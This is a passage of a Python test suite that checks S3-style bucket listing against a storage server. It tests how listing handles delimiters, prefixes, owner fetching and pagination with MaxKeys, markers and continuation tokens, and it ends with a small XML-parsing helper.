response['NextContinuationToken'] = None
if last:
eq(response['NextContinuationToken'], None)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(len(keys), len(check_objs))
eq(len(prefixes), len(check_prefixes))
eq(keys, check_objs)
eq(prefixes, check_prefixes)
return response['NextContinuationToken']
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
def test_bucket_list_delimiter_prefix():
bucket_name = _create_objects(keys=['asdf', 'boo/bar', 'boo/baz/xyzzy', 'cquux/thud', 'cquux/bla'])
delim = '/'
marker = ''
prefix = ''
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['asdf'], [], 'asdf')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, True, [], ['boo/'], 'boo/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['cquux/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, True, ['asdf'], ['boo/'], 'boo/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 2, False, [], ['cquux/'], None)
prefix = 'boo/'
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['boo/bar'], [], 'boo/bar')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['boo/baz/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, False, ['boo/bar'], ['boo/baz/'], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix():
bucket_name = _create_objects(keys=['asdf', 'boo/bar', 'boo/baz/xyzzy', 'cquux/thud', 'cquux/bla'])
delim = '/'
continuation_token = ''
prefix = ''
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['asdf'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, True, [], ['boo/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, False, [], ['cquux/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, True, ['asdf'], ['boo/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 2, False, [], ['cquux/'], last=True)
prefix = 'boo/'
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['boo/bar'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, False, [], ['boo/baz/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, False, ['boo/bar'], ['boo/baz/'], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefix and delimiter handling when object ends with delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix_ends_with_delimiter():
bucket_name = _create_objects(keys=['asdf/'])
validate_bucket_listv2(bucket_name, 'asdf/', '/', None, 1000, False, ['asdf/'], [], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefix and delimiter handling when object ends with delimiter')
def test_bucket_list_delimiter_prefix_ends_with_delimiter():
bucket_name = _create_objects(keys=['asdf/'])
validate_bucket_list(bucket_name, 'asdf/', '/', '', 1000, False, ['asdf/'], [], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='non-slash delimiter characters')
def test_bucket_list_delimiter_alt():
bucket_name = _create_objects(keys=['bar', 'baz', 'cab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='a')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
# bar, baz, and cab should be broken up by the 'a' delimiters
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['ba', 'ca'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='non-slash delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_alt():
bucket_name = _create_objects(keys=['bar', 'baz', 'cab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='a')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
# bar, baz, and cab should be broken up by the 'a' delimiters
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['ba', 'ca'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes starting with underscore')
def test_bucket_list_delimiter_prefix_underscore():
bucket_name = _create_objects(keys=['_obj1_','_under1/bar', '_under1/baz/xyzzy', '_under2/thud', '_under2/bla'])
delim = '/'
marker = ''
prefix = ''
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['_obj1_'], [], '_obj1_')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, True, [], ['_under1/'], '_under1/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['_under2/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, True, ['_obj1_'], ['_under1/'], '_under1/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 2, False, [], ['_under2/'], None)
prefix = '_under1/'
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['_under1/bar'], [], '_under1/bar')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['_under1/baz/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, False, ['_under1/bar'], ['_under1/baz/'], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes starting with underscore')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix_underscore():
bucket_name = _create_objects(keys=['_obj1_','_under1/bar', '_under1/baz/xyzzy', '_under2/thud', '_under2/bla'])
delim = '/'
continuation_token = ''
prefix = ''
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['_obj1_'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, True, [], ['_under1/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, False, [], ['_under2/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, True, ['_obj1_'], ['_under1/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 2, False, [], ['_under2/'], last=True)
prefix = '_under1/'
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['_under1/bar'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, False, [], ['_under1/baz/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, False, ['_under1/bar'], ['_under1/baz/'], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='percentage delimiter characters')
def test_bucket_list_delimiter_percentage():
bucket_name = _create_objects(keys=['b%ar', 'b%az', 'c%ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='%')
eq(response['Delimiter'], '%')
keys = _get_keys(response)
    # foo contains no '%' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # b%ar, b%az, and c%ab should be broken up by the '%' delimiter
eq(prefixes, ['b%', 'c%'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='percentage delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_percentage():
bucket_name = _create_objects(keys=['b%ar', 'b%az', 'c%ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='%')
eq(response['Delimiter'], '%')
keys = _get_keys(response)
    # foo contains no '%' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # b%ar, b%az, and c%ab should be broken up by the '%' delimiter
eq(prefixes, ['b%', 'c%'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='whitespace delimiter characters')
def test_bucket_list_delimiter_whitespace():
bucket_name = _create_objects(keys=['b ar', 'b az', 'c ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter=' ')
eq(response['Delimiter'], ' ')
keys = _get_keys(response)
    # foo contains no whitespace and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # 'b ar', 'b az', and 'c ab' should be broken up by the ' ' delimiter
eq(prefixes, ['b ', 'c '])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='whitespace delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_whitespace():
bucket_name = _create_objects(keys=['b ar', 'b az', 'c ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter=' ')
eq(response['Delimiter'], ' ')
keys = _get_keys(response)
    # foo contains no whitespace and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # 'b ar', 'b az', and 'c ab' should be broken up by the ' ' delimiter
eq(prefixes, ['b ', 'c '])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='dot delimiter characters')
def test_bucket_list_delimiter_dot():
bucket_name = _create_objects(keys=['b.ar', 'b.az', 'c.ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='.')
eq(response['Delimiter'], '.')
keys = _get_keys(response)
    # foo contains no '.' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # b.ar, b.az, and c.ab should be broken up by the '.' delimiter
eq(prefixes, ['b.', 'c.'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='dot delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_dot():
bucket_name = _create_objects(keys=['b.ar', 'b.az', 'c.ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='.')
eq(response['Delimiter'], '.')
keys = _get_keys(response)
    # foo contains no '.' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
    # b.ar, b.az, and c.ab should be broken up by the '.' delimiter
eq(prefixes, ['b.', 'c.'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='non-printable delimiter can be specified')
def test_bucket_list_delimiter_unreadable():
key_names=['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='\x0a')
eq(response['Delimiter'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='non-printable delimiter can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_unreadable():
key_names=['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='\x0a')
eq(response['Delimiter'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='empty delimiter can be specified')
def test_bucket_list_delimiter_empty():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='')
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='empty delimiter can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_empty():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='')
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='unspecified delimiter defaults to none')
def test_bucket_list_delimiter_none():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
    # with no Delimiter specified, the response does not include a Delimiter value
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='unspecified delimiter defaults to none')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_none():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
    # with no Delimiter specified, the response does not include a Delimiter value
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_notempty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, FetchOwner=True)
objs_list = response['Contents']
eq('Owner' in objs_list[0], True)
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_defaultempty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
objs_list = response['Contents']
eq('Owner' in objs_list[0], False)
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
    response = client.list_objects_v2(Bucket=bucket_name, FetchOwner=False)
objs_list = response['Contents']
eq('Owner' in objs_list[0], False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='unused delimiter is not found')
def test_bucket_list_delimiter_not_exist():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
    # the delimiter is echoed back even though it matches none of the keys
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='unused delimiter is not found')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_not_exist():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/')
    # the delimiter is echoed back even though it matches none of the keys
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='list with delimiter not skip special keys')
def test_bucket_list_delimiter_not_skip_special():
key_names = ['0/'] + ['0/%s' % i for i in range(1000, 1999)]
key_names2 = ['1999', '1999#', '1999+', '2000']
key_names += key_names2
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names2)
eq(prefixes, ['0/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='returns only objects under prefix')
def test_bucket_list_prefix_basic():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='foo/')
eq(response['Prefix'], 'foo/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar', 'foo/baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='returns only objects under prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_basic():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='foo/')
eq(response['Prefix'], 'foo/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar', 'foo/baz'])
eq(prefixes, [])
# just testing that we can do the delimiter and prefix logic on non-slashes
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='prefixes w/o delimiters')
def test_bucket_list_prefix_alt():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='ba')
eq(response['Prefix'], 'ba')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar', 'baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='prefixes w/o delimiters')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_alt():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='ba')
eq(response['Prefix'], 'ba')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar', 'baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='empty prefix returns everything')
def test_bucket_list_prefix_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='empty prefix returns everything')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='unspecified prefix returns everything')
def test_bucket_list_prefix_none():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='unspecified prefix returns everything')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_none():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='nonexistent prefix returns nothing')
def test_bucket_list_prefix_not_exist():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='d')
eq(response['Prefix'], 'd')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='nonexistent prefix returns nothing')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_not_exist():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='d')
eq(response['Prefix'], 'd')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='non-printable prefix can be specified')
def test_bucket_list_prefix_unreadable():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='\x0a')
eq(response['Prefix'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='non-printable prefix can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_unreadable():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='\x0a')
eq(response['Prefix'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='returns only objects directly under prefix')
def test_bucket_list_prefix_delimiter_basic():
key_names = ['foo/bar', 'foo/baz/xyzzy', 'quux/thud', 'asdf']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/', Prefix='foo/')
eq(response['Prefix'], 'foo/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar'])
eq(prefixes, ['foo/baz/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='returns only objects directly under prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_basic():
key_names = ['foo/bar', 'foo/baz/xyzzy', 'quux/thud', 'asdf']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/', Prefix='foo/')
eq(response['Prefix'], 'foo/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar'])
eq(prefixes, ['foo/baz/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='non-slash delimiters')
def test_bucket_list_prefix_delimiter_alt():
key_names = ['bar', 'bazar', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='a', Prefix='ba')
eq(response['Prefix'], 'ba')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar'])
eq(prefixes, ['baza'])
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_alt():
key_names = ['bar', 'bazar', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='a', Prefix='ba')
eq(response['Prefix'], 'ba')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar'])
eq(prefixes, ['baza'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix')
def test_bucket_list_prefix_delimiter_prefix_not_exist():
key_names = ['b/a/r', 'b/a/c', 'b/a/g', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='d', Prefix='/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_prefix_not_exist():
key_names = ['b/a/r', 'b/a/c', 'b/a/g', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='d', Prefix='/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='over-ridden slash ceases to be a delimiter')
def test_bucket_list_prefix_delimiter_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='z', Prefix='b')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['b/a/c', 'b/a/g', 'b/a/r'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='over-ridden slash ceases to be a delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='z', Prefix='b')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['b/a/c', 'b/a/g', 'b/a/r'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix and delimiter')
def test_bucket_list_prefix_delimiter_prefix_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='z', Prefix='y')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix and delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_prefix_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='z', Prefix='y')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=1, marker')
def test_bucket_list_maxkeys_one():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=1)
eq(response['IsTruncated'], True)
keys = _get_keys(response)
eq(keys, key_names[0:1])
response = client.list_objects(Bucket=bucket_name, Marker=key_names[0])
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names[1:])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/max_keys=1, marker')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_one():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1)
eq(response['IsTruncated'], True)
keys = _get_keys(response)
eq(keys, key_names[0:1])
response = client.list_objects_v2(Bucket=bucket_name, StartAfter=key_names[0])
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names[1:])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=0')
def test_bucket_list_maxkeys_zero():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=0)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/max_keys=0')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_zero():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=0)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/o max_keys')
def test_bucket_list_maxkeys_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
eq(response['MaxKeys'], 1000)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/o max_keys')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
eq(response['MaxKeys'], 1000)
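# botocore 'after-call' hook: stash the raw XML body of the most recent
# response in a module-level global so tests (e.g. test_account_usage) can
# parse fields that boto3 does not surface directly.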
def get_http_response_body(**kwargs):
global http_response_body
http_response_body = kwargs['http_response'].__dict__['_content']
def parseXmlToJson(xml):
response = {}
for child in list(xml):
if len(list(child)) > 0:
response[child.tag] = parseXmlToJson(child)
else:
response[child.tag] = child.text or ''
# one-liner equivalent
# response[child.tag] = parseXmlToJson(child) if len(list(child)) > 0 else child.text or ''
return response
